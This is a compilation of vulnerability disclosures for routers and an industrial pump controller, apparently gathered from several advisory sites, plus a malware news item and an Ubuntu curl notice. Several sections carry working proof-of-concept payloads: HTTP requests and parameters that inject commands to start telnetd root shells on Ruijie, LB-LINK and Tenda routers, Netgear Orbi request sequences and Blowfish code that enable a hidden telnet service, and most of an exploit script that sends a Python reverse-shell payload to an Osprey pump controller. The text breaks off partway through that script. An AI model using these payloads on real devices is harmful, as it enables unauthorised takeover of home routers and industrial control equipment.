RG-EW1200G PRO Wireless Routers EW_3.0(1)B11P204, RG-EW1800GX PRO Wireless Routers EW_3.0(1)B11P204, and RG-EW3200GX PRO Wireless Routers EW_3.0(1)B11P204 were discovered to contain multiple command injection vulnerabilities via the data.ip, data.protocal, data.iface and data.package parameters in the runPackDiagnose function of diagnose.lua.

**Information**

**Vendor of the products:**    Ruijie Networks

**Vendor's website:**    https://www.ruijienetworks.com

**Reported by:**    WangJincheng(wjcwinmt@outlook.com)

**Affected products:**

RG-EW1200G PRO Wireless Routers

RG-EW1800GX PRO Wireless Routers

RG-EW3200GX PRO Wireless Routers

**Affected firmware version:**

EW\_3.0(1)B11P204 (the latest release version)

**Firmware download address:**   

RG-EW1200G PRO Wireless Routers

RG-EW1800GX PRO Wireless Routers

RG-EW3200GX PRO Wireless Routers

**Overview**

Ruijie Networks RG-EW PRO Series Wireless Routers EW_3.0(1)B11P204 was discovered to contain a command injection vulnerability via the data.ip, data.protocal, data.iface and data.package parameters in the runPackDiagnose function of diagnose.lua. Successful exploit could allow an authorized attacker to execute arbitrary commands on remote devices.

**Vulnerability details**

**The vulnerability was detected in the file /usr/lib/lua/luci/modules/diagnose.lua.**

It is easy to see that all four fields data.ip, data.protocal, data.iface and data.package will eventually be concatenated into the _shell variable by the %s formatting string and executed as arguments to the doShell function.

In the file /usr/lib/lua/luci/utils/tool.lua. Notice that in the doShell function, some dangerous characters are filtered before the command is executed. However, **the command delimiter \n is not filtered**.

Therefore, we can use \n as the command separator, inject malicious commands into the data.ip, data.protocal, data.iface and data.package fields, and execute them (In JSON data, \n will be converted to the Unicode encode \u000a, so it's also okay to use \u000a as the separator).

**Poc**

Send the following request message.

    POST /cgi-bin/luci/api/diagnose?auth=xxx HTTP/1.1
    Host: 192.168.110.1
    Content-Length: 218
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Content-type: application/json
    Accept: */*
    Origin: http://192.168.110.1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: __APP_LANG__=zh_cn
    Connection: close
    
    {"method":"runPackDiagnose","params":{"ip":"\ntelnetd -l /bin/sh -p 1111\n","protocal":"\ntelnetd -l /bin/sh -p 2222\n","iface":"\ntelnetd -l /bin/sh -p 3333\n","package":"\ntelnetd -l /bin/sh -p 4444\n","size":"666"}}
    

**Attack Demo**

Use BurpSuite to send the above POC.

Then, the attacker can log in to the remote device directly through telnet and control it entirely (remote login through port 2222, 3333 or 4444 is also available).

CVE-2023-27796: my-vuls/RG-EW PRO Series at main · winmt/my-vuls

LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.

**Information**

**Vendor of the products:**    LB-LINK

**Vendor's website:**

https://www.lb-link.cn (Global)

https://www.b-link.net.cn (China)

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**

LB-LINK BL-AC1900\_2.0

LB-LINK BL-WR9000

LB-LINK BL-X26

LB-LINK BL-LTE300

**Affected firmware version:**

LB-LINK BL-AC1900\_2.0 V1.0.1 (the latest release version)

LB-LINK BL-WR9000 V2.4.9 (the latest release version)

LB-LINK BL-X26 V1.2.5 (the latest release version)

LB-LINK BL-LTE300 V1.0.8 (the latest release version)

**Firmware download address:**

LB-LINK BL-AC1900\_2.0 V1.0.1

LB-LINK BL-WR9000 V2.4.9

LB-LINK BL-X26 V1.2.5

LB-LINK BL-LTE300 V1.0.8

**Overview**

LB-LINK BL-AC1900_2.0 V1.0.1, BL-WR9000 V2.4.9, BL-X26 V1.2.5 and BL-LTE300 V1.0.8 Wireless Routers were discovered to contain a command injection vulnerability. The vulnerability is caused by the lax check of the mac field. An unauthorized attacker can send crafted requests to /goform/set_LimitClient_cfg, executing arbitrary commands on remote devices.

**Vulnerability details**

**The vulnerability was detected in the file /lib/libshare-0.0.26.so.**

In the bs_SetLimitCli_info function of /lib/libshare-0.0.26.so, obtain the contents of the mac, time1, and time2 fields from the JSON data passed in.

When the time1 and time2 fields are both 00:00-00:00, the contents of the mac field are spliced into a format string without any checks and executed as an argument to bl_do_system.

In the ftext function, the entry to the **/bin/goahead** program, the formDefineCGIjson function is called to define the corresponding handler for the URL /goform/xxx.

The /goform/set_LimitClient_cfg URL corresponds to sub_44DB74.

In sub_44DB74 function, the content of fields in POST request is obtained by websGetVar, then converted to JSON format, and the JSON data is passed to vulnerability function bs_SetLimitCli_info.

In summary, if the time1 and time2 fields are both 00:00-00:00, malicious commands can be injected into the mac field and executed.

**Poc**

Send the following as a POST request to the URL /goform/set_LimitClient_cfg.

    time1=00:00-00:00&time2=00:00-00:00&mac=;telnetd -l /bin/sh;
    

Just set the Cookie to user=admin, and the program has no special checks for Cookie. This means that no authentication is required to exploit the vulnerability.

**Attack Demo**

Before attack, we scan ports and ensure that only ports 53 and 80 are enabled.

Then, use BurpSuite to send the above POC.

After that, we scan ports again and dectect that the port 23 which represents Telnet service has been opened.

Finally, the attacker can log in to the remote device directly through telnet and control it entirely.

CVE-2023-26801: my-vuls/LB-LINK BL-AC1900, BL-WR9000, BL-X26 and BL-LTE300 Wireless Routers at main · winmt/my-vuls

Ruijie Networks RG-EW1200 Wireless Routers EW_3.0(1)B11P204 was discovered to contain a command injetion vulnerability via the params.path parameter in the upgradeConfirm function.

**Information**

**Vendor of the products:**    Ruijie Networks

**Vendor's website:**    https://www.ruijienetworks.com

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**    RG-EW1200 Wireless Routers

**Affected firmware version:**    EW\_3.0(1)B11P204 (the latest release version, 2023.1.18)

**Firmware download address:**    https://www.ruijienetworks.com/support/documents/slide\_77459

**Overview**

Ruijie Networks RG-EW1200 Wireless Routers EW_3.0(1)B11P204 was discovered to contain a command injection vulnerability via the params.path parameter in the upgradeConfirm function of system.lua. Successful exploit could allow the attacker to execute arbitrary commands on remote devices.

**Vulnerability details****Vulnerability point**

**The vulnerability was detected in the file /usr/lib/lua/luci/modules/system.lua.**

In the upgradeConfirm function of /usr/lib/lua/luci/modules/system.lua. When params.isEstAll is empty, the parameter params.path is directly spliced through the format string %q into the variable _shell without checking and execute as a parameter of forkExec.

Therefore, an attacker can inject arbitrary commands into params.path to gain control of the remote devices.

**Call flow**

In the file /usr/lib/lua/luci/controller/eweb/api.lua, we can see system.lua corresponding API is /system.

Therefore, system.lua can be accessed via URL /cgi-bin/luci/api/system, and the request body can be posted as json.

In the handle function of /usr/lib/lua/luci/utils/jsonrpc.lua, use the resolve function to find the relevant function in system.lua corresponding to the method field of the POST request body. Then it calls copcall through proxy to run the function, and use the contents of params field as its parameter.

**Poc**

Send the following as a POST request to the URL /cgi-bin/luci/api/system.

    {
    	"method": "upgradeConfirm",
    	"params": {
    		"isPersist": "aaaa",
    		"path": "`telnetd -p 8888 -l /bin/sh`"
    	}
    }
    

**Attack Demo**

Use BurpSuite to send the above POC. From the echo information, we can judge that the command injection is successful.

At this point, we use the injection command telnetd -p 8888 -l /bin/sh to open the corresponding telnet port 8888, and directly start the shell.

The attacker can log in to the remote device directly through telnet and control it entirely.

CVE-2023-26800: my-vuls/RG-EW1200 at main · winmt/my-vuls

A vulnerability in TOTOLINK CP900 V6.3c.566 allows attackers to start the Telnet service,

CVE-2022-28493

By Deeba Ahmed
As per a report from AhnLab Security Emergency Response Center (ASEC), poorly managed Linux SSH servers are becoming…
This is a post from HackRead.com Read the original post: ShellBot DDoS Malware Targets Linux SSH Servers

As per a report from AhnLab Security Emergency Response Center (ASEC), poorly managed Linux SSH servers are becoming the targets of a new campaign in which different variants of ShellBot malware are being deployed.

**What is meant by Poorly Managed Servers?**

Poorly managed services refer to weak account credentials, which make the server vulnerable to dictionary attacks. Services such as MS-SQL and RDP (remote desktop protocol) are often targeted.

In Linux servers, SSH (secure shell) services are the primary targets. In IoT environments, dictionary attacks are targeted against the Telnet service installed on an embedded Linux OS or an old Linux server.

**What is ShellBot?**

ShellBot, also known as PerIBot, is an old DDoS bot malware developed in Perl. The malware typically uses Internet Relay Chat/IRC protocol to establish communication with its C2 server.

Currently, the malware is being used to launch attacks against insecure Linux systems, targeting servers with weak credentials. It is deployed on a system after attackers use scanner malware to determine whether the system has SSH port 22 open.

**Attack Details**

ASEC researchers noted that ShellBot was used in attacks targeting Linux servers that were distributing cryptocurrency miners through a shell script compiler.

“If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific targets after receiving a command from the threat actor,” ASEC’s report read.

The attack begins by using a list of SSH credentials to launch a dictionary attack and breach the server. Once this is accomplished, the threat actor deploys the payload and leverages the IRC protocol to communicate with the C2 server and receive commands that instruct ShellBot to conduct DDoS attacks and steal data.

**Different ShellBot Variants Used in the Campaign**

According to ASEC researchers, three variants of ShellBot were identified, including LiGhT’s Modded perlbot v2, DDoS PBot v2.0, and PowerBots (C) GohacK. The first two versions feature a wide range of DDoS attack commands with HTTP, UDP, and TCP protocols.

Conversely, PowerBots are equipped with backdoor-like capabilities that can provide shell access and upload arbitrary files from the infected host. Threat actors can use these backdoor capabilities for the installation of additional malware and launch different types of attacks, abusing the server.

1.  Windows, Linux and macOS Users Hit by APT Group
2.  Multi-platform SysJoker backdoor hits Linux Devices
3.  DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

ShellBot DDoS Malware Targets Linux SSH Servers

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear\_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

    def crypt_64bit_up(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0, 0x10):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[-2]
        y = y ^ pArray[-1]
        return (x, y)
    
    def crypt_64bit_down(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0x11, 1, -1):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[1]
        y = y ^ pArray[0]
        return (x, y) 
    

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

**Exploit Proof of Concept**

    $ ./enable_telnet_poc.py
    Plaintext payload:
    00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
    00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
    00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    Encrypted payload:
    00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
    00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
    00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
    00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
    00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    
    $ telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escape character is '^]'.
     === LOGIN ===============================
      Please enter your account and password,
      It's the same with DUT GUI
     ------------------------------------------
    telnet account: admin
    telnet password:
    
    BusyBox v1.30.1 () built-in shell (ash)
    
      .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
     d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
    888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
    888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
    888      888  888      888   888  888       .88ooo8888.      .8PY888.
    `88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
     `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o
    
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, 10.0.3440.3644)
     ---------------------------------------------------------------
    root@RBR750:/#
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-38452: TALOS-2022-1595 || Cisco Talos Intelligence Group

Ubuntu Security Notice 5964-1 - Harry Sintonen discovered that curl incorrectly handled certain TELNET connection options. Due to lack of proper input scrubbing, curl could pass on user name and telnet options to the server as provided, contrary to expectations. Harry Sintonen discovered that curl incorrectly handled special tilde characters when used with SFTP paths. A remote attacker could possibly use this issue to circumvent filtering.

==========================================================================  
Ubuntu Security Notice USN-5964-1  
March 20, 2023

curl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in curl.

Software Description:  
- curl: HTTP, HTTPS, and FTP client and client libraries

Details:

Harry Sintonen discovered that curl incorrectly handled certain TELNET  
connection options. Due to lack of proper input scrubbing, curl could pass  
on user name and telnet options to the server as provided, contrary to  
expectations. (CVE-2023-27533)

Harry Sintonen discovered that curl incorrectly handled special tilde  
characters when used with SFTP paths. A remote attacker could possibly use  
this issue to circumvent filtering. (CVE-2023-27534)

Harry Sintonen discovered that curl incorrectly reused certain FTP  
connections. This could lead to the wrong credentials being reused,  
contrary to expectations. (CVE-2023-27535)

Harry Sintonen discovered that curl incorrectly reused connections when the  
GSS delegation option had been changed. This could lead to the option being  
reused, contrary to expectations. (CVE-2023-27536)

Harry Sintonen discovered that curl incorrectly reused certain SSH  
connections. This could lead to the wrong credentials being reused,  
contrary to expectations. (CVE-2023-27538)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   curl                            7.85.0-1ubuntu0.5  
   libcurl3-gnutls                 7.85.0-1ubuntu0.5  
   libcurl3-nss                    7.85.0-1ubuntu0.5  
   libcurl4                        7.85.0-1ubuntu0.5

Ubuntu 22.04 LTS:  
   curl                            7.81.0-1ubuntu1.10  
   libcurl3-gnutls                 7.81.0-1ubuntu1.10  
   libcurl3-nss                    7.81.0-1ubuntu1.10  
   libcurl4                        7.81.0-1ubuntu1.10

Ubuntu 20.04 LTS:  
   curl                            7.68.0-1ubuntu2.18  
   libcurl3-gnutls                 7.68.0-1ubuntu2.18  
   libcurl3-nss                    7.68.0-1ubuntu2.18  
   libcurl4                        7.68.0-1ubuntu2.18

Ubuntu 18.04 LTS:  
   curl                            7.58.0-2ubuntu3.24  
   libcurl3-gnutls                 7.58.0-2ubuntu3.24  
   libcurl3-nss                    7.58.0-2ubuntu3.24  
   libcurl4                        7.58.0-2ubuntu3.24

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5964-1  
   CVE-2023-27533, CVE-2023-27534, CVE-2023-27535, CVE-2023-27536,  
   CVE-2023-27538

Package Information:  
   https://launchpad.net/ubuntu/+source/curl/7.85.0-1ubuntu0.5  
   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.10  
   https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.18  
   https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.24

Ubuntu Security Notice USN-5964-1

Tenda AX3 V16.03.12.11 was discovered to contain a command injection vulnerability via the lanip parameter at /goform/AdvSetLanip.

**Tenda AX3 V16.03.12.11 command injection vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-3476.html
    

**Affected version**

**Vulnerability details**

In /goform/AdvSetLanip, /goform/telnet, You can set lanip in AdvSetLanip. In the telnet function, the program will get the value of lanip and pass it into the system without any filtering. If the user passes in a malicious command, it will cause a command injection vulnerability.

**Poc**

import requests

url \= "http://192.168.0.1/goform/AdvSetLanip"

lanIp \= ';reboot;'

r \= requests.post(url, data\={'lanIp': lanIp})
print(r.content)

url \= "http://192.168.0.1/goform/telnet"

r \= requests.post(url, data\={'lanIp': lanIp})
print(r.content)

You can see that the router restarts, forming a command injection vulnerability, and finally you can write exp to get root shell

CVE-2023-27240: CVE/readme.md at main · yjzy00001/CVE

Osprey Pump Controller version 1.0.1 unauthenticated remote code execution exploit.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: The controller suffers from an unauthenticated command injection# vulnerability that allows system access with www-data permissions.## ----------------------------------------------------------------------# Triggering command injection...# Trying vector: /DataLogView.php# Operator...?# You got a call from 192.168.3.180:54508# www-data@OspreyController:/var/www/html$ id;pwd# uid=33(www-data) gid=33(www-data) groups=33(www-data)# /var/www/html# www-data@OspreyController:/var/www/html$ exit# Zya!# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5754# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5754.php### 05.01.2023##                   o    o#                  O    O#                   o    o#                    o    o#_____________________\  /#                      ||#                      ||#                      ||from  time  import   sleepimport pygame.midi   #---#import subprocess    #---#import threading    #-----#import telnetlib    #-----#import requests    #-------#import socket    #-----------#import pygame    #-----------#import random    #-----------#import sys     #---------------#import re     #-----------------####### #      #-----------------#class Pump__it__up:    def __init__(self):        self.sound=False        self.param="eventFileSelected"        self.vector=["/DataLogView.php?"+self.param,                     "/AlarmsView.php?"+self.param,                     "/EventsView.php?"+self.param,                     "/index.php"] # POST        self.payload=None        self.sagent="Tic"        self.rhost=None        self.lhost=None        self.lport=None    def propo(self):        if len(sys.argv)!=4:            self.kako()        else:            self.presh()            self.rhost=sys.argv[1]            self.lhost=sys.argv[2]            self.lport=int(sys.argv[3])            if not "http" in self.rhost:                self.rhost="http://{}".format(self.rhost)    def kako(self):        self.pumpaj()        print("Ovakoj: python {} [RHOST:RPORT] [LHOST] [LPORT]".format(sys.argv[0]))        exit(0)    def pumpaj(self):        titl="""                 .-.                 |  \\                 | / \\             ,___| |  \\            / ___( )   L           '-`   | |   |                 | |   F                 | |  /                 | |                 | |             ____|_|____            [___________]      ,,,,,/,,,,,,,,,,,,,\\,,,,,o-------------------------------------o Osprey Pump Controller RCE Rev Shel_                v1.0j          Ref: ZSL-2023-5754            by lqwrm, 2023o-------------------------------------o        """        print(titl)    def injekcija(self):        self.headers={"Accept":"*/*",                      "Connection":"close",                      "User-Agent":self.sagent,                      "Cache-Control":"max-age=0",                       "Accept-Encoding":"gzip,deflate",                      "Accept-Language":"en-US,en;q=0.9"}            self.payload =";"######################################################"        self.payload+="/usr/bin/python%20-c%20%27import%20socket,subprocess,os;"        self.payload+="s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con"        self.payload+="nect((%22"+self.lhost+"%22,"+str(self.lport)+"));os.dup2"        self.payload+="(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),"        self.payload+="2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27"#######"                print("Triggering command injection...")                for url in self.vector:            if url=="/index.php":                print("Trying vector:",url)                import urllib.parse                